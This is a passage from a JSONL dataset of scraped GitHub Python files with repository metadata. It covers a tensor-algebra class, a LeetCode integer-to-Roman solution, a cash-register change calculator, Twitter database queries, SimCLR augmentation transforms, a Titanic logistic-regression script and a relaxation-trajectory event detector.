[]\n        order.extend([dims]);\n        order.extend(range(0, dims));\n        order.extend(range(dims+1, N));\n\n        newdata = self.permute(order).data;\n        newdata = newdata.reshape(shp[dims], tools.prod(shp)/shp[dims]);\n        if(option == None):\n            newdata = numpy.dot(mat, newdata);\n            p = mat.shape[0];\n        elif(option == 't'):\n            newdata = numpy.dot(mat.transpose(), newdata);\n            p = mat.shape[1];\n        else:\n            raise ValueError(\"Unknown option\");\n\n        newshp = [p];\n        newshp.extend(tools.getelts(shp, range(0, dims)));\n        newshp.extend(tools.getelts(shp, range(dims+1, N)));\n\n        Y = tensor(newdata, newshp);\n        Y = Y.ipermute(order);\n        return Y;\n\n    def ttv(self, v, dims):\n        \"\"\" Tensor times vector\n\n        Parameters\n        ----------\n        v - column vector\n        d - dimensions\n\n        Returns\n        -------\n        out : Khatri-Rao product as a numpy array\n        \"\"\"\n        (dims, vidx) = tools.tt_dimscheck(dims, self.ndims(), len(v));\n        remdims = numpy.setdiff1d(range(self.ndims()), dims);\n        if self.ndims() > 1:\n            c = self.permute(numpy.concatenate((remdims, dims))).data;\n\n        n = self.ndims()-1;\n        sz = numpy.array(self.shape)[numpy.concatenate((remdims, dims))]\n        for i in range(len(dims)-1, -1, -1):\n            c = c.reshape(numpy.prod(sz[0:n]), sz[n], order='F')\n            c = numpy.dot(c, v[vidx[i]]);\n            n = n-1;\n\n        if n > 0:\n            c = tensor(c, sz[0:n]);\n        else:\n            c = c[0];\n\n        return c;\n\n    def tondarray(self):\n        \"\"\"return an ndarray that contains the data of the tensor\"\"\"\n        return self.data;\n\n    # Math, logic operators\n    def __add__(self, other):\n        return self.funwrap(other, \"add\");\n    def __sub__(self, other):\n        return self.funwrap(other, \"sub\");\n    def __mul__(self, other):\n        return self.funwrap(other, \"mul\");\n    def __eq__(self, other):\n        return self.funwrap(other, \"eq\");\n    def __ne__(self, other):\n        return self.funwrap(other, \"ne\");\n    def __lt__(self, other):\n        return self.funwrap(other, \"lt\");\n    def __gt__(self, other):\n        return self.funwrap(other, \"gt\");\n    def __le__(self, other):\n        return self.funwrap(other, \"le\");\n    def __ge__(self, other):\n        return self.funwrap(other, \"ge\");\n\n    def funwrap(self, other, fun):\n        \"\"\"wrapper function for logical operators\"\"\"\n        if(other.__class__ == tensor):\n            if(self.shape != other.shape):\n                raise ValueError(\"Shapes of the tensors do not match\");\n\n            if(fun == \"add\"):\n                return tensor(self.data.__add__(other.data), self.shape);\n            elif(fun == \"sub\"):\n                return tensor(self.data.__sub__(other.data), self.shape);\n            elif(fun == \"mul\"):\n                raise ValueError(\"Use ttt() instead.\");\n            elif(fun == \"eq\"):\n                return tensor(self.data.__eq__(other.data), self.shape);\n            elif(fun == \"ne\"):\n                return tensor(self.data.__ne__(other.data), self.shape);\n            elif(fun == \"gt\"):\n                return tensor(self.data.__gt__(other.data), self.shape);\n            elif(fun == \"ge\"):\n                return tensor(self.data.__ge__(other.data), self.shape);\n            elif(fun == \"lt\"):\n                return tensor(self.data.__lt__(other.data), self.shape);\n            elif(fun == \"le\"):\n                return tensor(self.data.__le__(other.data), self.shape);\n            else:\n                raise ValueError(\"Unknown function\");\n        else:\n            if(fun == \"add\"):\n                return tensor(self.data.__add__(other), self.shape);\n            elif(fun == \"sub\"):\n                return tensor(self.data.__sub__(other), self.shape);\n            elif(fun == \"mul\"):\n                return tensor(self.data.__mul__(other), self.shape);\n            elif(fun == \"eq\"):\n                return tensor(self.data.__eq__(other), self.shape);\n            elif(fun == \"ne\"):\n                return tensor(self.data.__ne__(other), self.shape);\n            elif(fun == \"gt\"):\n                return tensor(self.data.__gt__(other), self.shape);\n            elif(fun == \"ge\"):\n                return tensor(self.data.__ge__(other), self.shape);\n            elif(fun == \"lt\"):\n                return tensor(self.data.__lt__(other), self.shape);\n            elif(fun == \"le\"):\n                return tensor(self.data.__le__(other), self.shape);\n            else:\n                raise ValueError(\"Unknown function\");\n\n    def __pos__(self):\n        pass; # do nothing\n    def __neg__(self):\n        return tensor(self.data * -1, self.shape);\n\n\n# Special Constructors\ndef tenzeros(shp):\n    \"\"\"special constructor, construct a tensor with the shape filled with 0\"\"\"\n    data = numpy.ndarray(shp);\n    data.fill(0);\n    return tensor(data, shp);\ndef tenones(shp):\n    \"\"\"special constructor, construct a tensor with the shape filled with 1\"\"\"\n    data = numpy.ndarray(shp);\n    data.fill(1);\n    return tensor(data, shp);\ndef tenrands(shp):\n    \"\"\"special constructor, construct a tensor with the shape filled with random number between 0 and 1\"\"\"\n    data = numpy.random.random(shp);\n    return tensor(data, shp);\ndef tendiag(vals, shape=None):\n    \"\"\"special constructor, construct a tensor with the values in the diagonal\"\"\"\n\n    # if shape is None or\n    # number of dimensions of shape is less than the number of values given\n    if (shape == None or len(shape) < len(vals)):\n        shape = [len(vals)]*len(vals);\n    else:\n        shape = list(shape);\n        for i in range(0, len(vals)):\n            if(shape[i] < len(vals)):\n                shape[i] = len(vals);\n\n    data = numpy.ndarray(shape);\n    data.fill(0);\n\n    # put the values in the ndarray\n    for i in range(0, len(vals)):\n        data.put(tools.sub2ind(shape, [i]*len(shape)), vals[i]);\n    return tensor(data, shape);\n","repo_name":"aschein/tensor_analysis","sub_path":"test_joyce_code/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":12958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"27234454469","text":"# 12. Integer to Roman\n#\n# Roman numerals are represented by seven different symbols: I, V, X, L, C, D and M.\n#\n# Symbol       Value\n# I             1\n# V             5\n# X             10\n# L             50\n# C             100\n# D             500\n# M             1000\n#\n# For example, two is written as II in Roman numeral, just two one's added together.\n# Twelve is written as, XII, which is simply X + II. The number twenty seven is\n# written as XXVII, which is XX + V + II.\n#\n# Roman numerals are usually written largest to smallest from left to right. However,\n# the numeral for four is not IIII. Instead, the number four is written as IV.\n# Because the one is before the five we subtract it making four. The same principle\n# applies to the number nine, which is written as IX. There are six instances where\n# subtraction is used:\n#\n# I can be placed before V (5) and X (10) to make 4 and 9.\n# X can be placed before L (50) and C (100) to make 40 and 90.\n# C can be placed before D (500) and M (1000) to make 400 and 900.\n#\n# Given an integer, convert it to a roman numeral. Input is guaranteed to be within\n# the range from 1 to 3999.\n#\n# Example 1:\n#\n# Input: 3\n# Output: \"III\"\n#\n# Example 2:\n#\n# Input: 4\n# Output: \"IV\"\n#\n# Example 3:\n#\n# Input: 9\n# Output: \"IX\"\n#\n# Example 4:\n#\n# Input: 58\n# Output: \"LVIII\"\n# Explanation: C = 100, L = 50, XXX = 30 and III = 3.\n#\n# Example 5:\n#\n# Input: 1994\n# Output: \"MCMXCIV\"\n# Explanation: M = 1000, CM = 900, XC = 90 and IV = 4.\n#\n# Companies asking this question: Twitter\n\nclass Solution(object):\n    def intToRoman(self, num):\n        \"\"\"\n        :type num: int\n        :rtype: str\n        \"\"\"\n        if num < 1 or num > 3999:\n            return 'Invalid input'\n\n        romansList = [\n            [1000, 'M'],\n            [900, 'CM'],\n            [500, 'D'],\n            [400, 'CD'],\n            [100, 'C'],\n            [90, 'XC'],\n            [50, 'L'],\n            [40, 'XL'],\n            [10, 'X'],\n            [9, 'IX'],\n            [5, 'V'],\n            [4, 'IV'],\n            [1, 'I']\n        ]\n\n        roman = ''\n        it = (x for x in romansList)\n        while num != 0:\n            integerValue, romanDigit = next(it)\n            placeValue = (num / integerValue) * integerValue\n            while placeValue > 0:\n                roman += romanDigit\n                placeValue -= integerValue\n            num -= (num / integerValue) * integerValue\n\n        return roman\n\n    def intToRoman_recursive(self, num):\n        if(num >= 1000):\n            return 'M' + self.intToRoman_recursive(num - 1000)\n        if(num >= 900):\n            return 'CM' + self.intToRoman_recursive(num - 900)\n        if(num >= 500):\n            return 'D' + self.intToRoman_recursive(num - 500)\n        if(num >= 400):\n            return 'CD' + self.intToRoman_recursive(num - 400)\n        if(num >= 100):\n            return 'C' + self.intToRoman_recursive(num - 100)\n        if(num >= 90):\n            return 'XC' + self.intToRoman_recursive(num - 90)\n        if(num >= 50):\n            return 'L' + self.intToRoman_recursive(num - 50)\n        if(num >= 40):\n            return 'XL' + self.intToRoman_recursive(num - 40)\n        if(num >= 10):\n            return 'X' + self.intToRoman_recursive(num - 10)\n        if(num >= 9):\n            return 'IX' + self.intToRoman_recursive(num - 9)\n        if(num >= 5):\n            return 'V' + self.intToRoman_recursive(num - 5)\n        if(num >= 4):\n            return 'IV' + self.intToRoman_recursive(num - 4)\n        if(num >= 1):\n            return 'I' + self.intToRoman_recursive(num - 1)\n        return ''\n\n\ndef test():\n    print('Testing intToRoman(self, num)...\\n')\n\n    s = Solution()\n\n    num = 3003\n    result = s.intToRoman(num)\n    print('Expected: MMMIII')\n    print('Output: ' + result + '\\n')\n\n    num = 3\n    result = s.intToRoman(num)\n    print('Expected: III')\n    print('Output: ' + result + '\\n')\n\n    num = 4\n    result = s.intToRoman(num)\n    print('Expected: IV')\n    print('Output: ' + result + '\\n')\n\n    num = 9\n    result = s.intToRoman(num)\n    print('Expected: IX')\n    print('Output: ' + result + '\\n')\n\n    num = 58\n    result = s.intToRoman(num)\n    print('Expected: LVIII')\n    print('Output: ' + result + '\\n')\n\n    num = 1994\n    result = s.intToRoman(num)\n    print('Expected: MCMXCIV')\n    print('Output: ' + result + '\\n')\n\ndef test_recursive():\n    print('Testing intToRoman_recursive(self, num)...\\n')\n\n    s = Solution()\n\n    num = 3003\n    result = s.intToRoman_recursive(num)\n    print('Expected: MMMIII')\n    print('Output: ' + result + '\\n')\n\n    num = 3\n    result = s.intToRoman_recursive(num)\n    print('Expected: III')\n    print('Output: ' + result + '\\n')\n\n    num = 4\n    result = s.intToRoman_recursive(num)\n    print('Expected: IV')\n    print('Output: ' + result + '\\n')\n\n    num = 9\n    result = s.intToRoman_recursive(num)\n    print('Expected: IX')\n    print('Output: ' + result + '\\n')\n\n    num = 58\n    result = s.intToRoman_recursive(num)\n    print('Expected: LVIII')\n    print('Output: ' + result + '\\n')\n\n    num = 1994\n    result = s.intToRoman_recursive(num)\n    print('Expected: MCMXCIV')\n    print('Output: ' + result + '\\n')\n\ntest()\ntest_recursive()","repo_name":"cbrodeur0818/coding-challenges","sub_path":"LeetCode/solutions/012M_integer_to_roman/012M_integer_to_roman.py","file_name":"012M_integer_to_roman.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33824174304","text":"# JavaScript Algorithms and Data Structures Projects: Cash Register\n#\n# Design a cash register drawer function checkCashRegister() that accepts purchase price as the first\n# argument (price), payment as the second argument (cash), and cash-in-drawer (cid) as the third argument.\n# cid is a 2D array listing available currency. The checkCashRegister() function should always return an\n# object with a status key and a change key. Return {status: \"INSUFFICIENT_FUNDS\", change: []} if cash-in-drawer\n# is less than the change due, or if you cannot return the exact change. Return {status: \"CLOSED\", change: [...]}\n# with cash-in-drawer as the value for the key change if it is equal to the change due. Otherwise, return\n# {status: \"OPEN\", change: [...]}, with the change due in coins and bills, sorted in highest to lowest order,\n# as the value of the change key.\n#\n# checkCashRegister(price, cash, cid) ➞ obj\n\n\ndef checkCashRegister(price, cash, cid):\n    val = [100, 20, 10, 5, 1, 0.25, 0.1, 0.05, 0.01]\n    coh = cid[::-1]\n    dif = cash - price\n    emp = dif == sum([d[1] for d in coh])\n    due = []\n    for i in range(len(coh)):\n        if dif > val[i] and coh[i][1] != 0:\n            cnt = 0\n            while coh[i][1] > 0 and dif - val[i] >= 0:\n                cnt += val[i]\n                coh[i][1] -= val[i]\n                dif = round(dif - val[i], 2)\n            due.append([coh[i][0], cnt])\n    return (\n        {\"status\": \"INSUFFICIENT_FUNDS\", \"change\": []}\n        if dif > 0\n        else {\"status\": \"CLOSED\", \"change\": cid}\n        if emp\n        else {\"status\": \"OPEN\", \"change\": due}\n    )\n\n\nprint(\n    checkCashRegister(\n        190.5,\n        500,\n        [\n            [\"PENNY\", 1.01],\n            [\"NICKEL\", 2.05],\n            [\"DIME\", 3.1],\n            [\"QUARTER\", 4.25],\n            [\"ONE\", 90],\n            [\"FIVE\", 55],\n            [\"TEN\", 20],\n            [\"TWENTY\", 60],\n            [\"ONE HUNDRED\", 100],\n        ],\n    )\n)\n# ➞ an object\nprint(\n    checkCashRegister(\n        19.5,\n        20,\n        [\n            [\"PENNY\", 1.01],\n            [\"NICKEL\", 2.05],\n            [\"DIME\", 3.1],\n            [\"QUARTER\", 4.25],\n            [\"ONE\", 90],\n            [\"FIVE\", 55],\n            [\"TEN\", 20],\n            [\"TWENTY\", 60],\n            [\"ONE HUNDRED\", 100],\n        ],\n    )\n)\n# ➞ {status: \"OPEN\", change: [[\"QUARTER\", 0.5]]}\nprint(\n    checkCashRegister(\n        3.26,\n        100,\n        [\n            [\"PENNY\", 1.01],\n            [\"NICKEL\", 2.05],\n            [\"DIME\", 3.1],\n            [\"QUARTER\", 4.25],\n            [\"ONE\", 90],\n            [\"FIVE\", 55],\n            [\"TEN\", 20],\n            [\"TWENTY\", 60],\n            [\"ONE HUNDRED\", 100],\n        ],\n    )\n)\n# ➞ {status: \"OPEN\", change: [[\"TWENTY\", 60], [\"TEN\", 20],\n# [\"FIVE\", 15], [\"ONE\", 1], [\"QUARTER\", 0.5], [\"DIME\", 0.2],\n# [\"PENNY\", 0.04]]}\nprint(\n    checkCashRegister(\n        19.5,\n        20,\n        [\n            [\"PENNY\", 0.01],\n            [\"NICKEL\", 0],\n            [\"DIME\", 0],\n            [\"QUARTER\", 0],\n            [\"ONE\", 0],\n            [\"FIVE\", 0],\n            [\"TEN\", 0],\n            [\"TWENTY\", 0],\n            [\"ONE HUNDRED\", 0],\n        ],\n    )\n)\n# ➞ {status: \"INSUFFICIENT_FUNDS\", change: []}\nprint(\n    checkCashRegister(\n        19.5,\n        20,\n        [\n            [\"PENNY\", 0.01],\n            [\"NICKEL\", 0],\n            [\"DIME\", 0],\n            [\"QUARTER\", 0],\n            [\"ONE\", 1],\n            [\"FIVE\", 0],\n            [\"TEN\", 0],\n            [\"TWENTY\", 0],\n            [\"ONE HUNDRED\", 0],\n        ],\n    )\n)\n# ➞ {status: \"INSUFFICIENT_FUNDS\", change: []}\nprint(\n    checkCashRegister(\n        19.5,\n        20,\n        [\n            [\"PENNY\", 0.5],\n            [\"NICKEL\", 0],\n            [\"DIME\", 0],\n            [\"QUARTER\", 0],\n            [\"ONE\", 0],\n            [\"FIVE\", 0],\n            [\"TEN\", 0],\n            [\"TWENTY\", 0],\n            [\"ONE HUNDRED\", 0],\n        ],\n    )\n)\n# ➞ {status: \"CLOSED\", change: [[\"PENNY\", 0.5], [\"NICKEL\", 0],\n# [\"DIME\", 0], [\"QUARTER\", 0], [\"ONE\", 0], [\"FIVE\", 0],\n# [\"TEN\", 0], [\"TWENTY\", 0], [\"ONE HUNDRED\", 0]]}\n","repo_name":"anthonyBosek/py-gorithms","sub_path":"projectAlgorithms/+Cash Register/cash_register.py","file_name":"cash_register.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
db.cursor()\n\n followers = {}\n\n sql = \"\"\"select * from follower\"\"\"\n\n cursor.execute(sql)\n\n for (iduser, idfollower) in cursor:\n followers.setdefault(iduser, set())\n followers[iduser].add(idfollower)\n\n cursor.close()\n db.close()\n\n return followers\n\n\ndef get_clusters_from_db():\n db = get_connection()\n cursor = db.cursor()\n\n sql = \"\"\"select screenname, cluster from user\"\"\"\n\n cursor.execute(sql)\n\n clusters = {}\n\n for (screen_name, cluster) in cursor:\n clusters.setdefault(cluster, [])\n clusters[cluster].append(screen_name)\n\n idx = 1\n ordered_clusters = OrderedDict()\n for cluster, users in clusters.iteritems():\n ordered_clusters['Cluster ' + str(idx)] = users\n idx += 1\n\n return ordered_clusters\n\n\ndef get_all_users():\n db = get_connection()\n cursor = db.cursor()\n sql = \"\"\"select iduser from user\"\"\"\n cursor.execute(sql)\n\n users = [u[0] for u in cursor]\n\n return set(users)\n\n\ndef get_all_friends():\n db = get_connection()\n cursor = db.cursor()\n sql = \"\"\"select distinct idfriend from friend\"\"\"\n cursor.execute(sql)\n\n users = [u[0] for u in cursor]\n\n return set(users)\n\n\ndef get_all_followers():\n db = get_connection()\n cursor = db.cursor()\n sql = \"\"\"select distinct idfollower from follower\"\"\"\n cursor.execute(sql)\n\n users = [u[0] for u in cursor]\n\n return set(users)\n\n\ndef get_inv_friends():\n all_users = get_all_users()\n db = get_connection()\n cursor = db.cursor()\n\n users_friends_count = {}\n\n sql = \"\"\"select f.idfriend, count(*) from friend f group by f.idfriend\"\"\"\n\n cursor.execute(sql)\n\n for record in cursor:\n if record[0] not in all_users:\n users_friends_count[record[0]] = int(record[1])\n\n return users_friends_count\n\n\ndef get_inv_followers():\n all_users = get_all_users()\n db = get_connection()\n cursor = db.cursor()\n\n user_followers_count = {}\n\n sql = \"\"\"select f.idfollower, count(*) from follower f group by f.idfollower\"\"\"\n\n cursor.execute(sql)\n\n for record in cursor:\n if record[0] not in all_users:\n user_followers_count[record[0]] = int(record[1])\n\n return user_followers_count\n\n\n","repo_name":"goraniliev/TwitterUsersClustering","sub_path":"db/get_utilities.py","file_name":"get_utilities.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33367409611","text":"import numpy as np\n\nfrom pl_bolts.utils import _OPENCV_AVAILABLE, _TORCHVISION_AVAILABLE\nfrom pl_bolts.utils.warnings import warn_missing_pkg\n\nif _TORCHVISION_AVAILABLE:\n from torchvision import transforms as transforms\nelse: # pragma: no cover\n warn_missing_pkg('torchvision')\n\nif _OPENCV_AVAILABLE:\n import cv2\nelse: # pragma: no cover\n warn_missing_pkg('cv2', pypi_name='opencv-python')\n\n\nclass SimCLRTrainDataTransform(object):\n \"\"\"\n Transforms for SimCLR\n\n Transform::\n\n RandomResizedCrop(size=self.input_height)\n RandomHorizontalFlip()\n RandomApply([color_jitter], p=0.8)\n RandomGrayscale(p=0.2)\n GaussianBlur(kernel_size=int(0.1 * self.input_height))\n transforms.ToTensor()\n\n Example::\n\n from pl_bolts.models.self_supervised.simclr.transforms import SimCLRTrainDataTransform\n\n transform = SimCLRTrainDataTransform(input_height=32)\n x = sample()\n (xi, xj) = transform(x)\n \"\"\"\n\n def __init__(\n self, input_height: int = 224, gaussian_blur: bool = True, jitter_strength: float = 1., normalize=None\n ) -> None:\n\n if not _TORCHVISION_AVAILABLE: # pragma: no cover\n 
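# --- Editor's note (not part of the dataset records): the three get_all_*
# helpers in the goraniliev/TwitterUsersClustering record above differ only
# in their SQL, and several helpers there return without closing the cursor
# or connection. A consolidated sketch using context managers; fetch_id_set
# is a hypothetical name, and get_connection() is assumed to return a
# DB-API connection with a close() method. Note also that
# clusters.iteritems() in that record is Python 2; on Python 3 it would be
# clusters.items().
from contextlib import closing

def fetch_id_set(sql):
    with closing(get_connection()) as db, closing(db.cursor()) as cursor:
        cursor.execute(sql)
        return {row[0] for row in cursor}

# all_users = fetch_id_set("select iduser from user")
# all_friends = fetch_id_set("select distinct idfriend from friend")
# all_followers = fetch_id_set("select distinct idfollower from follower")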
raise ModuleNotFoundError('You want to use `transforms` from `torchvision` which is not installed yet.')\n\n self.jitter_strength = jitter_strength\n self.input_height = input_height\n self.gaussian_blur = gaussian_blur\n self.normalize = normalize\n\n self.color_jitter = transforms.ColorJitter(\n 0.8 * self.jitter_strength, 0.8 * self.jitter_strength, 0.8 * self.jitter_strength,\n 0.2 * self.jitter_strength\n )\n\n data_transforms = [\n transforms.RandomResizedCrop(size=self.input_height),\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomApply([self.color_jitter], p=0.8),\n transforms.RandomGrayscale(p=0.2)\n ]\n\n if self.gaussian_blur:\n kernel_size = int(0.1 * self.input_height)\n if kernel_size % 2 == 0:\n kernel_size += 1\n\n data_transforms.append(GaussianBlur(kernel_size=kernel_size, p=0.5))\n\n data_transforms = transforms.Compose(data_transforms)\n\n if normalize is None:\n self.final_transform = transforms.ToTensor()\n else:\n self.final_transform = transforms.Compose([transforms.ToTensor(), normalize])\n\n self.train_transform = transforms.Compose([data_transforms, self.final_transform])\n\n # add online train transform of the size of global view\n self.online_transform = transforms.Compose([\n transforms.RandomResizedCrop(self.input_height),\n transforms.RandomHorizontalFlip(), self.final_transform\n ])\n\n def __call__(self, sample):\n transform = self.train_transform\n\n xi = transform(sample)\n xj = transform(sample)\n\n return xi, xj, self.online_transform(sample)\n\n\nclass SimCLREvalDataTransform(SimCLRTrainDataTransform):\n \"\"\"\n Transforms for SimCLR\n\n Transform::\n\n Resize(input_height + 10, interpolation=3)\n transforms.CenterCrop(input_height),\n transforms.ToTensor()\n\n Example::\n\n from pl_bolts.models.self_supervised.simclr.transforms import SimCLREvalDataTransform\n\n transform = SimCLREvalDataTransform(input_height=32)\n x = sample()\n (xi, xj) = transform(x)\n \"\"\"\n\n def __init__(\n self, input_height: int = 224, gaussian_blur: bool = True, jitter_strength: float = 1., normalize=None\n ):\n super().__init__(\n normalize=normalize,\n input_height=input_height,\n gaussian_blur=gaussian_blur,\n jitter_strength=jitter_strength\n )\n\n # replace online transform with eval time transform\n self.online_transform = transforms.Compose([\n transforms.Resize(int(self.input_height + 0.1 * self.input_height)),\n transforms.CenterCrop(self.input_height),\n self.final_transform,\n ])\n\n\nclass SimCLRFinetuneTransform(object):\n\n def __init__(\n self,\n input_height: int = 224,\n jitter_strength: float = 1.,\n normalize=None,\n eval_transform: bool = False\n ) -> None:\n\n self.jitter_strength = jitter_strength\n self.input_height = input_height\n self.normalize = normalize\n\n self.color_jitter = transforms.ColorJitter(\n 0.8 * self.jitter_strength,\n 0.8 * self.jitter_strength,\n 0.8 * self.jitter_strength,\n 0.2 * self.jitter_strength,\n )\n\n if not eval_transform:\n data_transforms = [\n transforms.RandomResizedCrop(size=self.input_height),\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomApply([self.color_jitter], p=0.8),\n transforms.RandomGrayscale(p=0.2)\n ]\n else:\n data_transforms = [\n transforms.Resize(int(self.input_height + 0.1 * self.input_height)),\n transforms.CenterCrop(self.input_height)\n ]\n\n if normalize is None:\n final_transform = transforms.ToTensor()\n else:\n final_transform = transforms.Compose([transforms.ToTensor(), normalize])\n\n data_transforms.append(final_transform)\n self.transform = 
transforms.Compose(data_transforms)\n\n def __call__(self, sample):\n return self.transform(sample)\n\n\nclass GaussianBlur(object):\n # Implements Gaussian blur as described in the SimCLR paper\n def __init__(self, kernel_size, p=0.5, min=0.1, max=2.0):\n if not _TORCHVISION_AVAILABLE: # pragma: no cover\n raise ModuleNotFoundError('You want to use `GaussianBlur` from `cv2` which is not installed yet.')\n\n self.min = min\n self.max = max\n\n # kernel size is set to be 10% of the image height/width\n self.kernel_size = kernel_size\n self.p = p\n\n def __call__(self, sample):\n sample = np.array(sample)\n\n # blur the image with a 50% chance\n prob = np.random.random_sample()\n\n if prob < self.p:\n sigma = (self.max - self.min) * np.random.random_sample() + self.min\n sample = cv2.GaussianBlur(sample, (self.kernel_size, self.kernel_size), sigma)\n\n return sample\n","repo_name":"chingyaoc/RINCE","sub_path":"ImageNet/simclr/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":6389,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"53"} +{"seq_id":"74533520487","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\ndata = pd.read_csv('train.csv')\nprint(data.head())\ndata = data.replace({'Embarked': {'S': 1, 'C': 2, 'Q': 3}, 'Sex': {'male': 1, 'female': 2}})\n#data.loc[data['Cabin'].notna(), 'Cabin'] = 1\n#data = data.fillna({'Cabin': 0})\ndata = data.fillna({'Age': data['Age'].mean()})\n\n#data[['Last_Name', 'First_Name']] = data['Name'].str.split(',', expand=True)\ny = data['Survived']\n\n#X = data[['Last_Name', 'Sex', 'Age', 'Pclass']]\nX = data[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked']]\nX = (X - X.mean()) / X.std()\nX.insert(0, 'Parch_age_Sex', value=X['Parch'] * X['Age'])\nX.insert(0, 'Sex_Parch', value=X['Sex'] * X['Parch'])\nX.insert(0, 'Sex_age', value=X['Sex'] * X['Age'])\n#X.insert(0, 'Parch_SibSp', value=X['Parch'] * X['SibSp'])\n#X.insert(0, 'Fare_Pclass', value=X['Fare'] * X['Pclass'])\nX.insert(0, 'Sex_SibSp', value=X['Sex'] * X['SibSp'])\nX.insert(0, 'Pclass_age', value=X['Pclass'] * X['Age'])\n#X.insert(0, 'Fare_age', value=X['Fare'] * X['Age'])\n#X.insert(0, 'Embarked_Fare', value=X['Embarked'] * X['Fare'])\nX = (X - X.mean()) / X.std()\nX = pd.get_dummies(X, columns=['Sex', 'Pclass', 'Embarked'])\n#X.insert(0, 'Cabin', value=data['Cabin'])\n\n#print(X.iloc[0:10, :])\n\nprint(X.head())\nprint(X.shape, y.shape, type(X), type(y))\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n#X_train, X_test, y_train, y_test = X.iloc[0:700, :], X.iloc[700:, :], y.iloc[0:700, ], y.iloc[700:, ]\n#print(X_train.shape, X_test.shape, y_test.shape, y_train.shape)\n\nlearningRate = 10\nepsilon = 0\n\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\n\n\ndef Costreg(theta, X, y, learningRate):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n\n first = np.multiply(-y, (np.log(sigmoid(X * theta.T) + epsilon)))\n second = np.multiply((1 - y), (np.log(1 - sigmoid(X * theta.T) + epsilon)))\n reg = (learningRate / (2 * len(X))) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))\n\n return np.sum(first - second) / len(X) + reg\n\n\ndef gradient(theta, X, y, learningRate):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n # parameters=int(theta.ravel().shape[1])\n # grad=np.zeros(parameters)\n\n error = sigmoid(X * theta.T) - y\n grad = ((X.T * error) / len(X)).T + 
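# --- Editor's note (not part of the dataset records): the SimCLR transform
# classes above return *three* views from __call__ -- two augmented views
# for the contrastive loss plus one "online" view -- even though the class
# docstring's `(xi, xj) = transform(x)` example shows only two. A minimal
# usage sketch (PIL, torchvision and opencv are assumed installed, since the
# default gaussian_blur=True path goes through cv2):
from PIL import Image

train_transform = SimCLRTrainDataTransform(input_height=32)
img = Image.new("RGB", (32, 32))  # stand-in for a real sample
xi, xj, x_online = train_transform(img)  # two contrastive views + online view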
((learningRate / len(X)) * theta)\n grad[0, 0] = np.sum(np.multiply(error, X[:, 0])) / len(X)\n\n return np.array(grad).ravel()\n\n\nX_train.insert(0, 'ones', 1)\nX_test.insert(0, 'ones', 1)\ncols = list(X_train.columns.values)\nX_train = np.array(X_train.values)\nX_test = np.array(X_test.values)\ntheta = np.zeros(X_train.shape[1])\nprint(theta.shape)\ny_train = np.array(y_train.values).reshape(-1, 1)\ny_test = np.array(y_test.values).reshape(-1, 1)\n\n#print(y.shape, X.shape)\n#print(Costreg(theta, X, y, learningRate))\n#grad = gradient(theta, X, y, learningRate)\n#print(grad.shape, grad)\n\nimport scipy.optimize as opt\ntheta_min = opt.fmin_bfgs(f=Costreg, x0=theta, fprime=gradient, args=(X_train, y_train, learningRate))\nprint(theta_min)\n\ntheta_min = np.matrix(theta_min)\n\n\ndef predict_survival(X, theta):\n p = sigmoid(X * theta.T)\n return [1 if x > 0.5 else 0 for x in p]\n\n\npredict = predict_survival(X_test, theta_min)\n\ncorrect = [1 if (a == 0 and b == 0) or (a == 1 and b == 1) else 0 for a, b in zip(predict, y_test)]\naccuracy = (sum(map(int, correct)) / len(correct))\nprint(accuracy)\nprint('accuracy = {0}%'.format(accuracy * 100))\n","repo_name":"BabaCafe/Titanic","sub_path":"titanic_log.py","file_name":"titanic_log.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30849814400","text":"import numpy as np\nfrom ..utils import rmean\nimport matplotlib.pyplot as plt\n\n\ndef id_reconstruction(images, save=False):\n \"\"\"Identify a reconstruction event by analyzing changes in\n the forces.\n\n Parameters\n ----------\n images : list of ASE atoms objects\n Relaxation trajectory.\n show : bool\n Create a figure to display the events located.\n\n Returns\n -------\n predicted_events: list of int\n index of images predicted before the event occurs.\n \"\"\"\n forces = []\n for i, atoms in enumerate(images):\n forces += [np.sqrt((atoms.get_forces()**2).sum())]\n forces = np.array(forces)\n\n frm = rmean(forces)\n fdiff = np.diff(frm)\n fterm = np.array([fdiff > 0.25 * frm[:-1]]).astype(int)[0]\n predicted_events = np.where(fterm[:-1] < fterm[1:])[0]\n\n if save:\n fig, ax = plt.subplots(figsize=(6, 4))\n l, = plt.plot(range(1, len(images) + 1), frm)\n ax.fill_between(\n range(1,\n len(images) + 1),\n np.zeros(len(images)),\n frm,\n facecolor=l.get_color(),\n alpha=0.5,\n interpolate=True)\n for i in predicted_events:\n plt.text(i - 1, 0.9, i)\n plt.axvline(i, ls='--', color='0.4')\n\n ylim = ax.get_ylim()\n plt.xlim(4, len(images))\n plt.ylim(0, ylim[1])\n plt.xlabel('Relaxation step')\n plt.ylabel('Force running mean (eV/$\\AA$)')\n plt.savefig(save)\n plt.close()\n\n return 